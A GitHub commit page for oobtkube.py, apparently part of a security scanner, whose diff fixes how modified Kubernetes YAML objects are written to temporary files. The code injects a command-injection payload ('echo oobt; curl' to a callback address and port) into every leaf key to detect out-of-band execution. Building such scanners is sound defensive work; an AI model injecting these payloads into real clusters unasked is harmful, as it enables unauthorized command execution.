Skip to content

Commit

Permalink
fix bug concatenating multiple k8s objects in the same file
Browse files Browse the repository at this point in the history
  • Loading branch information
@sfowl
sfowl committed Jan 8, 2025
1 parent c417790 commit f7efffd
Showing 1 changed file with 8 additions and 8 deletions.
16 changes: 8 additions & 8 deletions scanners/generic/tools/oobtkube.py
View file
Original file line number Diff line number Diff line change
Expand Up @@ -181,14 +181,14 @@ def modify_leaf_key(obj: Union[Dict, List], path: List, value: str) -> Union[Dic
leaf_keys = list(get_leaf_keys(data))

# For each leaf key, create a new modified object with an injected payload
with tempfile.NamedTemporaryFile(mode="w", suffix=".yaml") as tmp:
for i, path in enumerate(leaf_keys):
path_str = ".".join(str(p) for p in path)
logging.info(f"Testing leaf key ({i+1} / {len(leaf_keys)}): {path_str}")
# TODO test more kinds of payload variations
payload = f"echo oobt; curl {ipaddr}:{port}/{path_str}"
modified_data = modify_leaf_key(data, path, payload)

for i, path in enumerate(leaf_keys):
path_str = ".".join(str(p) for p in path)
logging.info(f"Testing leaf key ({i+1} / {len(leaf_keys)}): {path_str}")
# TODO test more kinds of payload variations
payload = f"echo oobt; curl {ipaddr}:{port}/{path_str}"
modified_data = modify_leaf_key(data, path, payload)

with tempfile.NamedTemporaryFile(mode="w", suffix=".yaml") as tmp:
yaml.dump(modified_data, tmp)
test_payload(tmp.name)

Expand Down

0 comments on commit f7efffd

Please sign in to comment.